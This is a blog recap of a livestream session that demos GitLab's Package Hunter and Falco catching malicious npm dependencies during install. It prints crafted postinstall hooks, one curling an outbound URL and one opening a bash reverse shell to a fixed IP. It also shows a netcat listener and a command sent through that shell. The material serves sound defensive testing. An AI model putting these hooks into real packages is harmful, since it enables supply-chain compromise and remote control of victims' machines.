Everyone can contribute! Let's learn together in a weekly cafe ☕


We love to break things, make mistakes, debug, analyse, fix problems together. Live and unfiltered on Youtube.

Community members and thought leaders regularly join and share their projects and ideas.

"Everyone Can Contribute" is inspired by GitLab's mission.

43. #EveryoneCanContribute cafe: More Package Dependency Hunting with GitLab


Michael Friedrich starts with an introduction to Package Hunter. Niclas Mietz dives into the cloud provisioned Package Hunter instance, and how to test malicious dependencies. Dennis Appelt chimes in to help.

Recording

Enjoy the session! 🦊


Highlights

The cafe starts with quick introduction and recap of last week’s session with Falco and how Package Hunter uses it under the hood. The slidedeck provides more insights into the workflows.

We’ve then inspected the Terraform module for provisioning a VM in Hetzner Cloud, which mimics the same installation process as the local Vagrantfile for Package Hunter. The server needs to be started in foreground:

NODE_ENV=development DEBUG=pkgs* node src/server.js

After starting the Package Hunter server, we tried the first malicious package upload with mal-yarn. It uses a specifically crafted postinstall script which tries to curl an outbound URL.

{
  "name": "mal-yarn",
  "version": "1.0.0",
  "main": "index.js",
  "license": "MIT",
  "scripts": {
    "postinstall": "curl https://everyonecancontribute.com"
  }
}

The tarball upload then triggered an alert in Package Hunter.

$ wget https://gitlab.com/everyonecancontribute/security/mal-yarn/-/archive/main/mal-yarn-main.tar.gz
$ curl --user 'dev:dev' -v -H 'Content-Type: application/octet-stream' --data-binary @mal-yarn-main.tar.gz http://localhost:3000/monitor/project/yarn

From there, we went to uploading a tarball of the gitlab-org/gitlab project. The Package Hunter output unveiled spawning many containers where the dependencies are installed.

$ wget https://gitlab.com/gitlab-org/gitlab/-/archive/master/gitlab-master.tar.gz
$ curl --user 'dev:dev' -v -H 'Content-Type: application/octet-stream' --data-binary @gitlab-master.tar.gz http://localhost:3000/monitor/project/yarn

The report can be retrieved by querying the received ID on the Package Hunter server. jq helps to parse the result.

$ curl --user 'dev:dev' http://localhost:3000/?id=322115d0-d96b-479b-b8f1-704bc4846025 | jq

The Package Hunter CLI polls and parses the Falco JSON report from the Package Hunter server and outputs the same format as the GitLab Dependency Scanning integration for MRs and dashbards. This magically works to take action without any extra patches.

$ DEBUG="*" package_hunter_HOST=http://localhost:3000 package_hunter_USER=dev package_hunter_PASS=dev node cli.js analyze gitlab-master.tar.gz --format=gitlab

$ cat gl-dependency-scanning-report.json | jq

In the last example, we used the specifically crafted twilio-npm package which opens a reverse shell where an attacker can send commands into. This happens in a similar fashion inside the package.json file.

"postinstall": "echo 'ASDF postinstall'; bash -c \"bash -i >/dev/tcp/116.203.139.79/8080 2>&1 0>&1\""

In a second terminal, the netcat commands needs listen for connections, and keep it open once received. Then an attacker can send commands to the remote server, in this case the Docker container which tests the package dependency installation.

$ nc -lkv 116.203.139.79 8080

The package was uploaded again, now spawning a connection to the nc command.

$ curl --user 'dev:dev' -v -H 'Content-Type: application/octet-stream' --data-binary @package.tar.gz http://localhost:3000/monitor/project/yarn

To simulate malicious intent, the package.json was deleted.

$ nc -lkv 116.203.139.79 8080

rm package.json

Inspecting the running Docker container proved exactly that.

$ docker exec -it 96df81b3cf0b /bin/bash
$ ls

Imagine this package passes your supply chain and lands in production, with read-write access for attackers. This is where Package Hunter and Falco help prevent this inside CI/CD pipelines, amongst other security scans like SAST, containers, dependencies, secrets, etc.

This check is integrated into the GitLab project’s CI/CD pipeline configuration for yarn and bundler. Future ideas are Golang, etc. - share your ideas in the Package Hunter project! 🦊

Insights


Date published: August 18, 2021

Tags: Security, Falco, Cloudnative, Gitlab, Package hunter